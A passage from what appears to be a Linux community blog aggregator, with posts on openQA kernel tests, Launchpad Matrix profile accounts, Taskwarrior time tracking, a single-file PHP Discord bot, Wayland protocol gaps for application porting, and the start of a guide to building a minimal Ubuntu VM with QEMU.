         power_action('reboot', textmode => 1);
-        $self->wait_boot if get_var('LTP_BAREMETAL');
+        $self->wait_boot if (get_var('FORCE_SERIAL_TERMINAL') || get_var('LTP_BAREMETAL'));
     }
 }
 

Likely I’ll make a new pull request to have this in the test distribution, but for now this is good enough to help kernel developers do some self-service and trigger their own openQA tests, which run many more tests (hopefully in parallel) and faster than if a person were doing all of this manually.

Special thanks to the QE Kernel team, who do the amazing job of thinking up scenarios like this; they save a lot of time.

on January 25, 2024 12:00 AM


January 22, 2024

Users can now add their Matrix accounts to their profile in Launchpad, as requested by Canonical’s Community team.

We also took the chance to slightly rework the frontend and how we display social accounts in user profiles. Instead of having a separate profile section for each social account, all social accounts are now grouped under a single “Social Accounts” section.

Adding a new Matrix account to your profile works similarly to how it has always worked for other accounts. Under the “Social Accounts” section in your user profile, you should now see a “No Matrix accounts registered” message and an edit button that leads to the Matrix accounts edit page. To edit or remove accounts, or add new ones, use the edit button shown in front of your newly added accounts in your profile.

We also added new API endpoints Person.social_accounts and Person.getSocialAccountsByPlatform() that will list the social accounts for a user. For more information, see our API documentation.
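If you script against Launchpad with launchpadlib, fetching these looks roughly like this. This is a hedged sketch: the endpoint names come from this announcement, but the username and the exact parameter name for the platform filter are assumptions.

from launchpadlib.launchpad import Launchpad

# Anonymous login is enough for reading public profile data.
lp = Launchpad.login_anonymously("social-accounts-demo", "production")
person = lp.people["example-user"]  # any Launchpad username

# List every social account on the profile.
for account in person.social_accounts:
    print(account)

# Or fetch accounts for one platform only (parameter name assumed).
print(person.getSocialAccountsByPlatform(platform="matrix"))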

Currently, Matrix is the only social platform supported. But during this process, we made it much easier for Launchpad developers to add new social platforms in the future.

on January 22, 2024 04:30 PM

January 17, 2024

Task management

Colin Watson

Now that I’m freelancing, I need to actually track my time, which is something I’ve had the luxury of not having to do before. That meant something of a rethink of the way I’ve been keeping track of my to-do list. Up to now that was a combination of things like the bug lists for the projects I’m working on at the moment, whatever task tracking system Canonical was using at the moment (Jira when I left), and a giant flat text file in which I recorded logbook-style notes of what I’d done each day plus a few extra notes at the bottom to remind myself of particularly urgent tasks. I could have started manually adding times to each logbook entry, but ugh, let’s not.

In general, I had the following goals (which were a bit reminiscent of my address book):

  • free software throughout
  • storage under my control
  • ability to annotate tasks with URLs (especially bugs and merge requests)
  • lightweight time tracking (I’m OK with having to explicitly tell it when I start and stop tasks)
  • ability to drive everything from the command line
  • decent filtering so I don’t have to look at my entire to-do list all the time
  • ability to easily generate billing information for multiple clients
  • optionally, integration with Android (mainly so I can tick off personal tasks like “change bedroom lightbulb” or whatever that don’t involve being near a computer)

I didn’t do an elaborate evaluation of multiple options, because I’m not trying to come up with the best possible solution for a client here. Also, there are a bazillion to-do list trackers out there and if I tried to evaluate them all I’d never do anything else. I just wanted something that works well enough for me.

Since it came up on Mastodon: a bunch of people swear by Org mode, which I know can do at least some of this sort of thing. However, I don’t use Emacs and don’t plan to use Emacs. nvim-orgmode does have some support for time tracking, but when I’ve tried vim-based versions of Org mode in the past I’ve found they haven’t really fitted my brain very well.

Taskwarrior and Timewarrior

One of the other Freexian collaborators mentioned Taskwarrior and Timewarrior, so I had a look at those.

The basic idea of Taskwarrior is that you have a task command that tracks each task as a blob of JSON and provides subcommands to let you add, modify, and remove tasks with a minimum of friction. task add adds a task, and you can add metadata like project:Personal (I always make sure every task has a project, for ease of filtering). Just running task shows you a task list sorted by Taskwarrior’s idea of urgency, with an ID for each task, and there are various other reports with different filtering and verbosity. task <id> annotate lets you attach more information to a task. task <id> done marks it as done. So far so good, so a redacted version of my to-do list looks like this:

$ task ls

ID A Project     Tags                 Description
17   Freexian                         Add Incus support to autopkgtest [2]
 7   Columbiform                      Figure out Lloyds online banking [1]
 2   Debian                           Fix troffcvt for groff 1.23.0 [1]
11   Personal                         Replace living room curtain rail

Once I got comfortable with it, this was already a big improvement. I haven’t bothered to learn all the filtering gadgets yet, but it was easy enough to see that I could do something like task all project:Personal and it’d show me both pending and completed tasks in that project, and that all the data was stored in ~/.task - though I have to say that there are enough reporting bells and whistles that I haven’t needed to poke around manually. In combination with the regular backups that I do anyway (you do too, right?), this gave me enough confidence to abandon my previous text-file logbook approach.
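To make the day-to-day loop concrete, here’s a sketch of the commands described above, reusing the lightbulb task from my earlier list (the ID, URL, and exact output wording are illustrative):

$ task add project:Personal 'Change bedroom lightbulb'
Created task 12.
$ task 12 annotate https://example.org/which-bulb-to-buy
Annotated 1 task.
$ task 12 done
Completed 1 task.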

Next was time tracking. Timewarrior integrates with Taskwarrior, albeit in an only semi-packaged way, and it was easy enough to set that up. Now I can do:

$ task 25 start
Starting task 00a9516f 'Write blog post about task tracking'.
Started 1 task.
Note: '"Write blog post about task tracking"' is a new tag.
Tracking Columbiform "Write blog post about task tracking"
  Started 2024-01-10T11:28:38
  Current                  38
  Total               0:00:00
You have more urgent tasks.
Project 'Columbiform' is 25% complete (3 of 4 tasks remaining).

When I stop work on something, I do task active to find the ID, then task <id> stop. Timewarrior does the tedious stopwatch business for me, and I can manually enter times if I forget to start/stop a task. Then the really useful bit: I can do something like timew summary :month <name-of-client> and it tells me how much to bill that client for this month. Perfect.
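Putting that together, the end of a work session looks roughly like this (a sketch; the task active columns are abbreviated from memory):

$ task active
ID Started    Active Description
25 2024-01-10 0:42   Write blog post about task tracking

$ task 25 stop
$ timew summary :month Columbiform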

I also started using VIT to simplify the day-to-day flow a little, which means I’m normally just using one or two keystrokes rather than typing longer commands. That isn’t really necessary from my point of view, but it does save some time.

Android integration

I left Android integration for a bit later since it wasn’t essential. When I got round to it, I have to say that it felt a bit clumsy, but it did eventually work.

The first step was to set up a taskserver. Most of the setup procedure was OK, but I wanted to use Let’s Encrypt to minimize the amount of messing around with CAs I had to do. Getting this to work involved hitting things with sticks a bit, and there’s still a local CA involved for client certificates. What I ended up with was a certbot setup with the webroot authenticator and a custom deploy hook as follows (with cert_name replaced by a DNS name in my house domain):

#! /bin/sh
set -eu

cert_name=taskd.example.org

# Only proceed if the taskd certificate was among the domains
# that certbot just renewed.
found=false
for domain in $RENEWED_DOMAINS; do
    case "$domain" in
        $cert_name)
            found=:
            ;;
    esac
done
$found || exit 0

# Copy the renewed certificate and key to where taskd can read them.
install -m 644 "/etc/letsencrypt/live/$cert_name/fullchain.pem" \
    /var/lib/taskd/pki/fullchain.pem
install -m 640 -g Debian-taskd "/etc/letsencrypt/live/$cert_name/privkey.pem" \
    /var/lib/taskd/pki/privkey.pem

# Pick up the new certificate.
systemctl restart taskd.service

I could then set this in /etc/taskd/config (server.crl.pem and ca.cert.pem were generated using the documented taskserver setup procedure):

server.key=/var/lib/taskd/pki/privkey.pem
server.cert=/var/lib/taskd/pki/fullchain.pem
server.crl=/var/lib/taskd/pki/server.crl.pem
ca.cert=/var/lib/taskd/pki/ca.cert.pem

Then I could set taskd.ca on my laptop to /usr/share/ca-certificates/mozilla/ISRG_Root_X1.crt and otherwise follow the client setup instructions, run task sync init to get things started, and then task sync every so often to sync changes between my laptop and the taskserver.
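For reference, the client-side configuration boils down to a handful of settings plus the initial sync. A sketch with placeholder values — the hostname, credentials string, and certificate paths all come from your own taskserver setup:

$ task config taskd.server taskd.example.org:53589
$ task config taskd.credentials 'Personal/colin/<key-uuid>'
$ task config taskd.certificate ~/.task/colin.cert.pem
$ task config taskd.key ~/.task/colin.key.pem
$ task config taskd.ca /usr/share/ca-certificates/mozilla/ISRG_Root_X1.crt
$ task sync init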

I used TaskWarrior Mobile as the client. I have to say I wouldn’t want to use that client as my primary task tracking interface: the setup procedure is clunky even beyond the necessity of copying a client certificate around, it expects you to give it a .taskrc rather than having a proper settings interface for that, and it only seems to let you add a task if you specify a due date for it. It also lacks Timewarrior integration, so I can only really use it when I don’t care about time tracking, e.g. personal tasks. But that’s really all I need, so it meets my minimum requirements.

Next?

Considering this is literally the first thing I tried, I have to say I’m pretty happy with it. There are a bunch of optional extras I haven’t tried yet, but in general it kind of has the vim nature for me: if I need something it’s very likely to exist or easy enough to build, but the features I don’t use don’t get in my way.

I wouldn’t recommend any of this to somebody who didn’t already spend most of their time in a terminal - but I do. I’m glad people have gone to all the effort to build this so I didn’t have to.

on January 17, 2024 01:28 PM

January 14, 2024

Discord have changed the way bots work quite a few times. Recently, though, they built a system that lets you create and register “slash commands” — commands that you can type into the Discord chat and which do things, like /hello — and which are powered by “webhooks”. That is: when someone uses your command, it sends an HTTP request to a URL of your choice, and your URL then responds, and that process powers what your users see in Discord. Importantly, this means that operating a Discord bot does not require a long-running server process. You don’t need to host it somewhere where you worry about the bot process crashing, how you’re going to recover from that, all that stuff. No daemon required. In fact, you can make a complete Discord bot in one single PHP file. You don’t even need any PHP libraries. One file, which you upload to your completely-standard shared hosting webspace, the same way you might upload any other simple PHP thing. Here’s some notes on how I did that.

The Discord documentation is pretty annoying and difficult to follow; all the stuff you need is in there, somewhere, but it’s often hard to find where, and there’s very little that explains why a thing is the way it is. It’s tough to grasp the “Zen” of how Discord wants you to work with their stuff. But in essence, you’ll need to create a Discord app: follow their instructions to do that. Then, we’ll write our small PHP file, and upload it; finally, fill in the URL of that PHP file as the “interactive endpoint URL” in your newly-created app’s general information page in the Discord developer admin. You can then add the bot to a server by visiting the URL from the “URL generator” for your app in the Discord dev admin.

The PHP file will get sent blocks of JSON, which describe what a user is doing — a command they’ve typed, parameters to that command, or whatever — and respond with something which is shown to the user — the text of a message which is your bot’s reply, or a command to alter the text of a previous message, or add a clickable button to it, and the like. I won’t go into detail about all the things you can do here (if that would be interesting, let me know and maybe I’ll write a followup or two), but the basic structure of your bot needs to be that it authenticates the incoming request from Discord, it interprets that request, and it responds to that request.

Authentication first. When you create your app, you get a client_public_key value, a big long string of hex digits that will look like c78c32c3c7871369fa67 or whatever. Your PHP file needs to know this value somehow. (How you do that is up to you; think of this like a MySQL username and password, and handle this the same way you do those.) Then, every request that comes in will have two important HTTP headers: X-Signature-ED25519 and X-Signature-Timestamp. You use a combination of these (which provide a signature for the incoming request) and your public key to check whether the request is legitimate. There are PHP libraries to do this, but fortunately we don’t need them; PHP has the relevant signature verification stuff built in, these days. So, to read the content of the incoming post and verify the signature on it:

/* read the incoming request data */
$postData = file_get_contents('php://input');
/* get the signature and timestamp header values */
$signature = isset($_SERVER['HTTP_X_SIGNATURE_ED25519']) ? 
    $_SERVER['HTTP_X_SIGNATURE_ED25519'] : "";
$timestamp = isset($_SERVER['HTTP_X_SIGNATURE_TIMESTAMP']) ? 
    $_SERVER['HTTP_X_SIGNATURE_TIMESTAMP'] : "";
/* check the signature */
$sigok = sodium_crypto_sign_verify_detached(
    hex2bin($signature), 
    $timestamp . $postData,
    hex2bin($client_public_key));
/* If signature is not OK, reject the request */
if (!$sigok) {
    http_response_code(401);
    die();
}

We need to correctly reject invalidly signed requests, because Discord will check that we do — they will occasionally send test requests with bad signatures to confirm that you’re doing the check. (They do this when you first add the URL to the Discord admin screens; if it won’t let you save the settings, then it’s because Discord thinks your URL returned the wrong thing. This is annoying, because you have no idea why Discord didn’t like it; best bet is to add lots of error_log() logging of inputs and outputs to your PHP file and inspect the results carefully.)

Next, interpret the incoming request and do things with it. The only thing we have to respond to here is a ping message; Discord will send them as part of their irregular testing, and expects to get back a correctly-formatted pong message.

$data = json_decode($postData);
if ($data->type == 1) { // this is a ping message
    echo json_encode(array('type' => 1)); // response: pong
    die();
}

The magic numbers there (1 for a ping, 1 for a pong) are both defined in the Discord docs (incoming values being the “Interaction Type” field and outgoing values the “Interaction Callback Type”.)

After that, the world’s approximately your oyster. You check the incoming type field for the type of incoming thing this is — a slash command, a button click in a message, whatever — and respond appropriately. This is all stuff for future posts if there’s interest, but the docs (in particular the “receiving and responding” and “message components” sections) have all the detail. For your bot to provide a slash command, you have to register it first, which is a faff; I wrote a little Python script to do that. You only have to do it once. The script looks approximately like this; you’ll need your APP_ID and your BOT_TOKEN from the Discord dashboard.

import requests

# Both of these come from the Discord developer dashboard:
APP_ID = "your-app-id"
BOT_TOKEN = "your-bot-token"

MY_COMMAND = {
    "name": 'doit',
    "description": 'Do the thing',
    "type": 1
}
discord_endpoint = \
    f"https://discord.com/api/v10/applications/{APP_ID}/commands"
requests.request("PUT", discord_endpoint,
    json=[MY_COMMAND], headers={
        "Authorization": f"Bot {BOT_TOKEN}",
        "User-Agent": 'mybotname (myboturl, 1.0.0)',
})

Once you’ve done that, you can use /doit in a channel with your bot in, and your PHP bot URL will receive the incoming request for you to process.
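Processing it back in the PHP file might look something like the following sketch — my illustration rather than canonical code: incoming type 2 is an application command, and callback type 4 means “respond with a visible message”.

/* handle the /doit slash command (sketch) */
if ($data->type == 2 && $data->data->name == "doit") {
    header('Content-Type: application/json');
    echo json_encode(array(
        'type' => 4,
        'data' => array('content' => 'Did the thing!')
    ));
    die();
}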

on January 14, 2024 09:57 PM

January 11, 2024

This post is in part a response to an aspect of Nate’s post “Does Wayland really break everything?”, but also my reflection on discussing Wayland protocol additions, a unique pleasure that I have been involved with for the past months [1].

Some facts

Before I start I want to make a few things clear: The Linux desktop will be moving to Wayland [2] – this is a fact at this point (and has been for a while); sticking to X11 makes no sense for future projects. From reading Wayland protocols and working with it at a much lower level than I ever wanted to, it is also very clear to me that Wayland is an exceptionally well-designed core protocol, and so are the additional extension protocols (xdg-shell & Co.). The modularity of Wayland is great; it gives it incredible flexibility and will for sure turn out to be good for the long-term viability of this project (and also provides a path to correct protocol issues in future, if one is found). In other words: Wayland is an amazing foundation to build on, and a lot of its design decisions make a lot of sense!

The shift towards people seeing “Linux” more as an application developer platform, and taking PipeWire and XDG Portals into account when designing for Wayland is also an amazing development and I love to see this – this holistic approach is something I always wanted!

Furthermore, I think Wayland removes a lot of functionality that shouldn’t exist in a modern compositor – and that’s a good thing too! Some of X11’s features and design decisions had clear drawbacks that we shouldn’t replicate. I highly recommend to read Nate’s blog post, it’s very good and goes into more detail. And due to all of this, I firmly believe that any advancement in the Wayland space must come from within the project.

But!

But! Of course there was a “but” coming 😉 – I think while developing Wayland-as-an-ecosystem we are now entrenched into narrow concepts of how a desktop should work. While discussing Wayland protocol additions, a lot of concepts clash, people from different desktops with different design philosophies debate the merits of those over and over again never reaching any conclusion (just as you will never get an answer out of humans whether sushi or pizza is the clearly superior food, or whether CSD or SSD is better). Some people want to use Wayland as a vehicle to force applications to submit to their desktop’s design philosophies, others prefer the smallest and leanest protocol possible, other developers want the most elegant behavior possible. To be clear, I think those are all very valid approaches.

But this also creates problems: By switching to Wayland compositors, we are already forcing a lot of porting work onto toolkit developers and application developers. This is annoying, but just work that has to be done. It becomes frustrating though if Wayland provides toolkits with absolutely no way to reach their goal in any reasonable way. For Nate’s Photoshop analogy: Of course Linux does not break Photoshop, it is Adobe’s responsibility to port it. But what if Linux was missing a crucial syscall that Photoshop needed for proper functionality and Adobe couldn’t port it without that? In that case it becomes much less clear on who is to blame for Photoshop not being available.

A lot of Wayland protocol work is focused on the environment and design, while applications and the work to port them are often given less consideration. I think this happens because the overlap between application developers and developers of the desktop environments is not necessarily large, and the overlap with people willing to engage with Wayland upstream is even smaller. The combination of Windows developers who port apps to Linux and also have involvement with toolkits or Wayland is pretty much nonexistent, so they have less of a voice.

A quick detour through the neuroscience research lab

I have been involved with Freedesktop, GNOME and KDE for an incredibly long time now (more than a decade), but my actual job (besides consulting for Purism) is that of a PhD candidate in a neuroscience research lab (working on the morphology of biological neurons and its relation to behavior). I am mostly involved with three research groups in our institute, which is about 35 people. Most of us do all our data analysis on powerful servers which we connect to using RDP (with KDE Plasma as desktop). Since I joined, I have been pushing the envelope a bit to extend Linux usage to data acquisition and regular clients, and to have our data acquisition hardware interface well with it. Linux brings some unique advantages for use in research, besides the obvious one of having every step of your data management platform introspectable with no black boxes left, a goal I value very highly in research (but this would be its own blogpost).

In terms of operating system usage though, most systems are still Windows-based. Windows is what companies develop for, and what people use by default and are familiar with. The choice of operating system is very strongly driven by application availability, and WSL being really good makes this somewhat worse, as it removes the need to switch to a real Linux system entirely if the occasional piece of software requires it. Yet, we have a lot more Linux users than before, and use it in many places where it makes sense. I also developed novel data acquisition software that runs only on Linux and uses the abilities of the platform to their fullest extent. All of this resulted in me asking existing software and hardware vendors for Linux support a lot more often. The vendor-customer relationship in science is usually pretty good, and vendors do usually want to help out. Same for open source projects, especially if you offer to do Linux porting work for them… But overall, the ease of use and availability of required applications rule supreme. Most people are not technically knowledgeable and just want to get their research done in the best way possible, getting the best results with the least amount of friction.

KDE/Linux usage at a control station for a particle accelerator at Adlershof Technology Park, Germany, for reference (by 25 years of KDE) [3]

Back to the point

The point of that story is this: GNOME, KDE, RHEL, Debian or Ubuntu: none of them matter if the necessary applications are not available for them. And as soon as they are, the easiest-to-use solution wins. There are many facets of “easiest”: In many cases this is RHEL due to Red Hat support contracts being available, in many other cases it is Ubuntu due to its mindshare and ease of use. KDE Plasma is also frequently seen, as it is perceived as a bit easier to onboard Windows users with (among other benefits). Ultimately, it comes down to applications and 3rd-party support though.

Here’s a dirty secret: In many cases, porting an application to Linux is not that difficult. The thing that companies (and FLOSS projects too!) struggle with and will calculate the merits of carefully in advance is whether it is worth the support cost as well as continuous QA/testing. Their staff will have to do all of that work, and they could spend that time on other tasks after all.

So if they learn that “porting to Linux” not only means added testing and support, but also means to choose between the legacy X11 display server that allows for 1:1 porting from Windows or the “new” Wayland compositors that do not support the same features they need, they will quickly consider it not worth the effort at all. I have seen this happen.

Of course many apps use a cross-platform toolkit like Qt, which greatly simplifies porting. But this just moves the issue one layer down, as now the toolkit needs to abstract Windows, macOS and Wayland. And Wayland does not contain features to do certain things or does them very differently from e.g. Windows, so toolkits have no way to actually implement the existing functionality in a way that works on all platforms. So in Qt’s documentation you will often find texts like “works everywhere except for on Wayland compositors or mobile” [4].

Many missing bits or altered behavior are just papercuts, but those add up. And if users will have a worse experience, this will translate to more support work, or people not wanting to use the software on the respective platform.

What’s missing?

Window positioning

SDI applications with multiple windows are very popular in the scientific world. For data acquisition (for example with microscopes) we often have one monitor with control elements and one larger one with the recorded image. There are also other configurations where multiple signal modalities are acquired, and the experimenter aligns windows exactly the way they want and expects the layout to be stored and loaded upon reopening the application. Even in the image from Adlershof Technology Park above you can see this style of UI design, at mega-scale. Being able to pop out elements as windows from a single-window application to move them around freely is another frequently used paradigm, and immensely useful with these complex apps.

It is important to note that this is not a legacy design, but in many cases an intentional choice – these kinds of apps work incredibly well on larger screens or many screens and are very flexible (you can have any window configuration you want, and switch between them using the (usually) great window management abilities of your desktop).

Of course, these apps will work terribly on tablets and small form factors, but that is not the purpose they were designed for and nobody would use them that way.

I assumed for sure these features would be implemented at some point, but when it became clear that that would not happen, I created the ext-placement protocol which had some good discussion but was ultimately rejected from the xdg namespace. I then tried another solution based on feedback, which turned out not to work for most apps, and now proposed xdg-placement (v2) in an attempt to maybe still get some protocol done that we can agree on, exploring more options before pushing the existing protocol for inclusion into the ext Wayland protocol namespace. Meanwhile though, we can not port any application that needs this feature, while at the same time we are switching desktops and distributions to Wayland by default.

Window position restoration

Similarly, a protocol to save & restore window positions was already proposed in 2018, 6 years ago now, but it has still not been agreed upon, and may not even help multiwindow apps in its current form. The absence of this protocol means that applications can not restore their former window positions, and the user has to move them to their previous place again and again.

Meanwhile, toolkits can not adopt these protocols and applications can not use them and can not be ported to Wayland without introducing papercuts.

Window icons

Similarly, individual windows can not set their own icons, and not-installed applications can not have an icon at all because there is no desktop-entry file to load the icon from and no icon in the theme for them. You would think this is a niche issue, but for applications that create many windows, providing icons for them so the user can find them is fairly important. Of course it’s not the end of the world if every window has the same icon, but it’s one of those papercuts that make the software slightly less user-friendly. Even applications with fewer windows like LibrePCB are affected, so much so that they rather run their app through Xwayland for now.

I decided to address this after I was working on data analysis of image data in a Python virtualenv, where my code and the Python libraries used created lots of windows all with the default yellow “W” icon, making it impossible to distinguish them at a glance. This is xdg-toplevel-icon now, but of course it is an uphill battle where the very premise of needing this is questioned. So applications can not use it yet.

Limited window abilities requiring specialized protocols

Firefox has a picture-in-picture feature, allowing it to pop out media from a media player as a separate floating window so the user can watch it while doing other things. On X11 this is easily realized, but on Wayland the restrictions posed on windows necessitate a different solution. The xdg-pip protocol was proposed for this specialized use case, but it is not merged yet, so this feature does not work as well on Wayland.

Automated GUI testing / accessibility / automation

Automation of GUI tasks is a powerful feature, so is the ability to auto-test GUIs. This is being worked on, with libei and wlheadless-run (and stuff like ydotool exists too), but we’re not fully there yet.

Wayland is frustrating for (some) application authors

As you can see, there are valid applications and valid use cases that can not yet be ported to Wayland with the same feature range they enjoyed on X11, Windows or macOS. So, from an application author’s perspective, Wayland does break things quite significantly, because things that worked before can no longer work, and Wayland (the whole stack) does not provide any avenue to achieve the same result.

Wayland does “break” screen sharing, global hotkeys, gaming latency (via “no tearing”) etc, however for all of these there are solutions available that application authors can port to. And most developers will gladly do that work, especially since the newer APIs are usually a lot better and more robust. But if you give application authors no path forward except “use Xwayland and be on emulation as second-class citizen forever”, it just results in very frustrated application developers.

For some application developers, switching to a Wayland compositor is like buying a canvas from the Linux shop that forces your brush to only draw triangles. But maybe for your avant-garde art, you need to draw a circle. You can approximate one with triangles, but it will never be as good as the artwork of your friends who got their canvases from the Windows or macOS art supply shop and have more freedom to create their art.

Triangles are proven to be the best shape! If you are drawing circles you are creating bad art!

Wayland, via its protocol limitations, forces a certain way to build application UX – often for the better, but also sometimes to the detriment of users and applications. The protocols are often fairly opinionated, a result of the lessons learned from X11. In any case though, it is the odd one out – Windows and macOS do not pose the same limitations (for better or worse!), and the effort to port to Wayland is orders of magnitude bigger, or sometimes in case of the multiwindow UI paradigm impossible to achieve to the same level of polish. Desktop environments of course have a design philosophy that they want to push, and want applications to integrate as much as possible (same as macOS and Windows!). However, there are many applications out there, and pushing a design via protocol limitations will likely just result in fewer apps.

The porting dilemma

I spent probably way too much time looking into how to get applications cross-platform and running on Linux, often talking to vendors (FLOSS and proprietary) as well. Wayland limitations aren’t the biggest issue by far, but they do start to come up now, especially in the scientific space with Ubuntu having switched to Wayland by default. For application authors there is often no way to address these issues. Many scientists do not even understand why their Python script that creates some GUIs suddenly behaves weirdly because Qt is now using the Wayland backend on Ubuntu instead of X11. They do not know the difference and also do not want to deal with these details – even though they may be programmers as well, the real goal is not to fiddle with the display server, but to get to a scientific result somehow.

Another issue is portability layers like Wine which need to run Windows applications as-is on Wayland. Apparently Wine’s Wayland driver has some heuristics to make window positioning work (and I am amazed by the work done on this!), but that can only go so far.

A way out?

So, how would we actually solve this? Fundamentally, this excessively long blog post boils down to just one essential question:

Do we want to force applications to submit to a UX paradigm unconditionally, potentially losing out on application ports or keeping apps on X11 eternally, or do we want to throw them some rope to get as many applications ported over to Wayland as possible, even though we might sacrifice some protocol purity?

I think we really have to answer that to make the discussions on wayland-protocols a lot less grueling. This question can be answered at the wayland-protocols level, but even more so it must be answered by the individual desktops and compositors.

If the answer for your environment turns out to be “Yes, we want the Wayland protocol to be more opinionated and will not make any compromises for application portability”, then your desktop/compositor should just immediately NACK protocols that add something like this and you simply shouldn’t engage in the discussion, as you reject the very premise of the new protocol: That it has any merit to exist and is needed in the first place. In this case contributors to Wayland and application authors also know where you stand, and a lot of debate is skipped. Of course, if application authors want to support your environment, you are basically asking them now to rewrite their UI, which they may or may not do. But at least they know what to expect and how to target your environment.

If the answer turns out to be “We do want some portability”, the next question obviously becomes where the line should be drawn and which changes are acceptable and which aren’t. We can’t blindly copy all X11 behavior, some porting work to Wayland is simply inevitable. Some written rules for that might be nice, but probably more importantly, if you agree fundamentally that there is an issue to be fixed, please engage in the discussions for the respective MRs! We for sure do not want to repeat X11 mistakes, and I am certain that we can implement protocols which provide the required functionality in a way that is a nice compromise in allowing applications a path forward into the Wayland future, while also being as good as possible and improving upon X11. For example, the toplevel-icon proposal is already a lot better than anything X11 ever had. Relaxing ACK requirements for the ext namespace is also a good proposed administrative change, as it allows some compositors to add features they want to support to the shared repository easier, while also not mandating them for others. In my opinion, it would allow for a lot less friction between the two different ideas of how Wayland protocol development should work. Some compositors could move forward and support more protocol extensions, while more restrictive compositors could support less things. Applications can detect supported protocols at launch and change their behavior accordingly (ideally even abstracted by toolkits).

You may now say that a lot of apps are ported, so surely this issue can not be that bad. And yes, what Wayland provides today may be enough for 80-90% of all apps. But what I hope the detour into the research lab has done is convince you that this smaller percentage of apps matters. A lot. And that it may be worthwhile to support them.

To end on a positive note: When it came to porting concrete apps over to Wayland, the only real showstoppers so far [5] were the missing window-positioning and window-position-restore features. I encountered them when porting my own software, and I got the issue as feedback from colleagues and fellow engineers. In second place was UI testing and automation support; the window-icon issue was mentioned twice, but being a cosmetic issue it likely simply hurts people less and they can ignore it more easily.

What this means is that the majority of apps are already fine, and many others are very, very close! A Wayland future for everyone is within our grasp! 😄

I will also bring my two protocol MRs to their conclusion for sure, because as application developers we need clarity on what the platform (either all desktops or even just a few) supports and will or will not support in future. And the only way to get something good done is by contribution and friendly discussion.

Footnotes

  1. Apologies for the clickbait-y title – it comes with the subject 😉 ↩
  2. When I talk about “Wayland” I mean the combined set of display server protocols and accepted protocol extensions, unless otherwise clarified. ↩
  3. I would have picked a picture from our lab, but that would have needed permission first ↩
  4. Qt has awesome “platform issues” pages, like for macOS and Linux/X11 which help with porting efforts, but Qt doesn’t even list Linux/Wayland as supported platform. There is some information though, like window geometry peculiarities, which aren’t particularly helpful when porting (but still essential to know). ↩
  5. Besides issues with Nvidia hardware – CUDA for simulations and machine-learning is pretty much everywhere, so Nvidia cards are common, which causes trouble on Wayland still. It is improving though. ↩
on January 11, 2024 04:24 PM

November 30, 2023

Every so often I have to make a new virtual machine for some specific use case. Perhaps I need a newer version of Ubuntu than the one I’m running on my hardware in order to build some software, and containerization just isn’t working. Or maybe I need to test an app that I made modifications to in a fresh environment. In these instances, it can be quite helpful to be able to spin up these virtual machines quickly, and only install the bare minimum software you need for your use case.

One common strategy when making a minimal or specially customized install is to use a server distro (like Ubuntu Server for instance) as the base and then install other things on top of it. This sorta works, but it’s less than ideal for a couple reasons:

  • Server distros are not the same as minimal distros. They may provide or offer software and configurations that are intended for a server use case. For instance, the ubuntu-server metapackage in Ubuntu depends on software intended for RAID array configuration and logical volume management, and it recommends software that enables LXD virtual machine related features. Chances are you don’t need or want these sort of things.

  • They can be time-consuming to set up. You have to go through the whole server install procedure, possibly having to configure or reconfigure things that are pointless for your use case, just to get the distro to install. Then you have to log in and customize it, adding an extra step.

If you’re able to use Debian as your distro, these problems aren’t so bad since Debian is sort of like Arch Linux - there’s a minimal base that you build on to turn it into a desktop or server. But for Ubuntu, there are desktop images (not usually what you want), server images (not usually what you want), cloud images (might be usable but could be tricky), and Ubuntu Core images (definitely not what you want for most use cases). So how exactly do you make a minimal Ubuntu VM?

As hinted at above, a cloud image might work, but we’re going to use a different solution here. As it turns out, you don’t actually have to use a prebuilt image or installer to install Ubuntu. Similar to the installation procedure Arch Linux provides, you can install Ubuntu manually, giving you very good control over what goes into your VM and how it’s configured.

This guide is going to be focused on doing a manual installation of Ubuntu into a VM, using debootstrap to install the initial minimal system. You can use this same technique to install Ubuntu onto physical hardware by just booting from a live USB and then using this technique on your hardware’s physical disk(s). However we’re going to be primarily focused on using a VM right now. Also, the virtualization software we’re going to be working with is QEMU. If you’re using a different hypervisor like VMware, VirtualBox, or Hyper-V, you can make a new VM and then install Ubuntu manually into it the same way you would install Ubuntu onto physical hardware using this technique. QEMU, however, provides special tools that make this procedure easier, and QEMU is more flexible than other virtualization software in my experience. You can install it by running sudo apt install qemu-system-x86 on your host system.

With that laid out, let us begin.

Open a terminal on your physical machine, and make a directory for your new VM to reside in. I’ll use “~/VMs/Ubuntu” here.

mkdir ~/VMs/Ubuntu
cd ~/VMs/Ubuntu

Next, let’s make a virtual disk image for the VM using the qemu-img utility.

qemu-img create -f qcow2 ubuntu.img 32G

This will make a 32 GiB disk image - feel free to customize the size or filename as you see fit. The -f parameter at the beginning specifies the VM disk image format. QCOW2 is usually a good option since the image will start out small and then get bigger as necessary. However, if you’re already using a copy-on-write filesystem like BTRFS or ZFS, you might want to use -f raw rather than -f qcow2 - this will make a raw disk image file and avoid the overhead of the QCOW2 file format.

Now we need to attach the disk image to the host machine as a device. I usually do this with qemu-nbd, which can attach a QEMU-compatible disk image to your physical system as a network block device. These devices look and work just like physical disks, which makes them extremely handy for modifying the contents of a disk image.

qemu-nbd requires that the nbd kernel module be loaded, and at least on Ubuntu, it’s not loaded by default, so we need to load it before we can attach the disk image to our host machine.

sudo modprobe nbd
sudo qemu-nbd -f qcow2 -c /dev/nbd0 ./ubuntu.img

This will make our ubuntu.img file available through the /dev/nbd0 device. Make sure to specify the format via the -f switch, especially if you’re using a raw disk image. QEMU will keep you from writing a new partition table to the disk image if you give it a raw disk image without telling it directly that the disk image is raw.

Once your disk image is attached, we can partition it and format it just like a real disk. For simplicity’s sake, we’ll give the drive an MBR partition table, create a single partition enclosing all of the disk’s space, then format the partition as ext4.

sudo fdisk /dev/nbd0
n
p
1


w
sudo mkfs.ext4 /dev/nbd0p1

(The two blank lines are intentional - they just accept the default options for the partition’s first and last sector, which makes a partition that encloses all available space on the disk.)
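If you’d rather not drive fdisk interactively, sfdisk can do the same thing non-interactively - a sketch, assuming sfdisk from util-linux is available on your host:

printf 'label: dos\ntype=83\n' | sudo sfdisk /dev/nbd0

This writes an MBR (“dos”) label with a single Linux partition spanning all available space, same as the fdisk session above.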

Now we can mount the new partition.

mkdir vdisk
sudo mount /dev/nbd0p1 ./vdisk

Now it’s time to install the minimal Ubuntu system. You’ll need to know the first part of the codename for the Ubuntu version you intend to install. The codenames for Ubuntu releases are an adjective followed by the name of an animal, like “Jammy Jellyfish”. The first word (“Jammy” in this instance) is the one you need. These codenames are easy to look up online. Here are the codenames for the currently supported LTS versions of Ubuntu, as well as the codename for the current development release:

